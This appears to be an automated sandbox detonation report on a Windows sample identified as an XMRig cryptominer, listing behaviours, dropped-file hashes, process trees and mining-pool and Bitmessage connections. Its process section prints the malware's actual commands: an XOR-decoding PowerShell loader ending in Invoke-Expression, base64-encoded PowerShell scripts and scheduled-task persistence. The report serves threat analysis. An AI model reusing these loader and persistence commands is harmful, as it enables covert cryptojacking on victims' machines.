Analysis Overview
SHA256
658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144
Threat Level: Known bad
The file 658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N was found to be: Known bad.
Malicious Activity Summary
Xmrig family
xmrig
XMRig Miner payload
Blocklisted process makes network request
Downloads MZ/PE file
Loads dropped DLL
Checks computer location settings
Deletes itself
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Command and Scripting Interpreter: PowerShell
Detects Pyinstaller
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 11:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 11:45
Reported
2024-10-27 11:47
Platform
win7-20241023-en
Max time kernel
15s
Max time network
16s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241027114540338.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20241027114540338.bat" "
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /delete /tn "Maintenance" /f
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241027114540338.xml"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
Network
Files
C:\Users\Admin\AppData\Local\Temp\zbe20241027114540338.bat
| MD5 | 8e1538e96332ff7b60ac15d330af55d3 |
| SHA1 | 161e7a00371107c55c4a3cb9505820d1b4c02bc6 |
| SHA256 | b73afc146054375209038ac660656a077d10e8256b1a2757126d8e5492e6117d |
| SHA512 | 9cbd7145117486ef3935a789e68622ce2942f807eb4133bba955283339af0891857c5ef98944f713c10903f25493ea41aedd1fe62aebc7bad76fe21bc85291fb |
C:\Users\Admin\AppData\Local\Temp\zb20241027114540338.bat
| MD5 | cd72d2f4156a7696edfa253a71704d7f |
| SHA1 | 5e3ecaa7c4d1319306a4781beb476cf0f951ab9d |
| SHA256 | c5d9896c1ef0beed07785be3401eb911523efce7fc569f6ba5184450dd2b4bf2 |
| SHA512 | ca409285ac8ae2047451276cbbce974d9741384afcc9abc8bdf7b5fcb8a588f60f37aac49099d895636b5fd1a7e2d5c1a11e7fbbcdaa3e570b5bf985b061f382 |
C:\Users\Admin\AppData\Local\Temp\zx20241027114540338.xml
| MD5 | e2943f1f3851cc465d729fbb717f161c |
| SHA1 | 2d9ec1338337f3c459d57edfe918c8592a7a72a3 |
| SHA256 | 285dfe3365fc4e552000a4a89c84532e46ef2e82b50336cbfd74abe9634e3eec |
| SHA512 | cba16639eec6acefe692fc845b8f6a21940459f9416f59dfafa5883cb26377ad2b86a66112f12141df318cc12419c40a87d7d6bacd83d83c89a1f16523942989 |
C:\Users\Admin\AppData\Local\Temp\ze20241027114540338.tmp
| MD5 | 21989db4b6cc664577d426658cb0855d |
| SHA1 | 01aa4808329a7f34b57dfbf345eda27f97d65369 |
| SHA256 | 870251d3d6c50b2ed787595a49e945d9ea26e0e3ff2a556c5c40a483215afae1 |
| SHA512 | e4ef93f7e5f26c347cc7fabb0c04a37f03c620f77486fe82ae17327ff035ac2dd9b80e77a156bef70de42c70c57dfd79908f2572abc487824b10eb1aa0ce71ed |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-27 11:45
Reported
2024-10-27 11:47
Platform
win10v2004-20241007-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
Loads dropped DLL
Obfuscated Files or Information: Command Obfuscation
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241027114540375.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20241027114540375.bat" "
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /delete /tn "Maintenance" /f
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241027114540375.xml"
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .
C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe
C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=78,83,113,66,67,25,122,96;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
".\wmntnnc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand JABwAGEAdABoAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA0ACgANAAoAJABiAGkAbgBmAG4APQAwAA0ACgBkAG8AIAB7AA0ACgAgACQAZgBpAGwAZQBzACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAEYAaQBsAHQAZQByACAAXwBNAEUASQAqAA0ACgAgAEYAbwByAEUAYQBjAGgAIAAoACQAZgBuACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsADQAKACAAIAAkAGIAaQBuAGYAbgA9ACQAcABhAHQAaAArACcAXAAnACsAJABmAG4ALgBuAGEAbQBlACsAJwBcAFEAdABHAHUAaQA0AC4AZABsAGwAJwANAAoAIAB9AA0ACgAgAGkAZgAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADEAMAAwAH0ADQAKAH0ADQAKAHcAaABpAGwAZQAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAA0ACgANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACQAYgBpAG4AZgBuACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoADQAKACQAZgBzAD0AMAANAAoAZABvAHsADQAKACAAdAByAHkAewAkAGYAcwAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGIAaQBuAGYAbgApAH0ADQAKACAAYwBhAHQAYwBoAHsAJABmAHMAPQAwAH0ADQAKACAAaQBmACgALQBuAG8AdAAgACQAZgBzACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQANAAoAfQANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgACQAZgBzACkADQAKAA0ACgAkAGEAPQA1ADEANwA2ADEAOAA2AA0ACgAkAG4APQA0AA0ACgAkAGYAcwAuAFMAZQBlAGsAKAAkAGEALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAbgA7ACQAaQArACsAKQB7ACQAZgBzAC4AVwByAGkAdABlAEIAeQB0AGUAKAAwACkAfQANAAoAJABmAHMALgBDAGwAbwBzAGUAKAApACAADQAKAGUAeABpAHQA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand dwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACcALgBcAHMAaQBuAGcAbABlAHQAbwBuAC4AbABvAGMAawAnACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAxADAAMAAwADsAJABpACsAKwApAA0ACgB7AA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwArACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAJABwAHIAdABjAC4AVwBhAGkAdABGAG8AcgBFAHgAaQB0ACgAKQANAAoAIAANAAoAIABpAGYAKAAkAHAAcgB0AGMALgBFAHgAaQB0AEMAbwBkAGUAIAAtAGUAcQAgADcANwA3ACkAewBiAHIAZQBhAGsAfQANAAoAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKACAAZQB4AGkAdAANAAoAfQA=
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
".\wmntnnc"
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
"C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | 71.96.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bootstrap8080.bitmessage.org | udp |
| US | 8.8.8.8:53 | bootstrap8444.bitmessage.org | udp |
| CA | 158.69.63.42:8080 | bootstrap8080.bitmessage.org | tcp |
| CH | 185.19.31.46:8080 | bootstrap8080.bitmessage.org | tcp |
| US | 158.222.217.190:8080 | tcp | |
| GB | 178.62.12.187:8448 | tcp | |
| ES | 194.164.163.84:8444 | bootstrap8444.bitmessage.org | tcp |
| US | 24.188.198.204:8111 | tcp | |
| DE | 5.45.99.75:8444 | tcp | |
| RU | 95.165.168.168:8444 | tcp | |
| DE | 178.11.46.221:8444 | tcp | |
| FR | 85.25.152.9:8444 | bootstrap8444.bitmessage.org | tcp |
| DE | 85.180.139.241:8444 | tcp | |
| GB | 109.147.204.113:1195 | tcp | |
| US | 8.8.8.8:53 | 9.152.25.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.163.164.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.63.69.158.in-addr.arpa | udp |
| DE | 85.114.135.102:8444 | bootstrap8444.bitmessage.org | tcp |
| RO | 185.158.248.216:8444 | bootstrap8444.bitmessage.org | tcp |
| US | 75.167.159.54:8444 | tcp | |
| US | 8.8.8.8:53 | 102.135.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.248.158.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| CH | 185.19.31.46:8080 | bootstrap8080.bitmessage.org | tcp |
| NL | 213.233.213.84:65524 | tcp | |
| US | 64.139.101.196:65517 | tcp | |
| NL | 46.21.250.132:8444 | tcp | |
| IN | 49.207.182.81:8444 | tcp | |
| PH | 136.158.41.145:8444 | tcp | |
| RU | 85.234.125.13:8444 | tcp | |
| KR | 211.254.40.61:8444 | tcp | |
| TR | 178.244.247.106:8444 | tcp | |
| RU | 94.229.99.238:8444 | tcp | |
| BR | 177.221.181.2:8444 | tcp | |
| DE | 81.95.5.34:8444 | tcp | |
| CN | 175.0.123.1:2820 | tcp | |
| CN | 175.0.122.91:2841 | tcp | |
| CN | 175.0.120.114:2841 | tcp | |
| US | 65.131.65.56:8444 | tcp | |
| US | 146.70.115.219:32649 | tcp | |
| DK | 185.129.62.63:8444 | tcp | |
| IN | 122.165.121.69:8444 | tcp | |
| IN | 122.180.144.141:8444 | tcp | |
| TR | 88.248.166.41:8444 | tcp | |
| RU | 5.227.186.88:8444 | tcp | |
| DZ | 105.96.16.92:8444 | tcp | |
| N/A | 127.0.0.1:8442 | tcp | |
| US | 8.8.8.8:53 | 69.121.165.122.in-addr.arpa | udp |
| TL | 103.99.26.98:8444 | tcp | |
| PL | 78.8.212.174:8444 | tcp | |
| CN | 175.0.121.42:2820 | tcp | |
| IN | 103.203.74.113:8444 | tcp | |
| BR | 191.54.31.111:8444 | tcp | |
| DZ | 105.102.128.81:8444 | tcp | |
| RU | 5.227.189.61:8444 | tcp | |
| IN | 117.247.48.119:8444 | tcp | |
| MY | 183.171.72.233:8444 | tcp | |
| VN | 113.161.176.88:8444 | tcp | |
| IN | 124.123.97.240:8444 | tcp | |
| HR | 78.1.155.147:65530 | tcp | |
| RS | 87.116.162.128:8444 | tcp | |
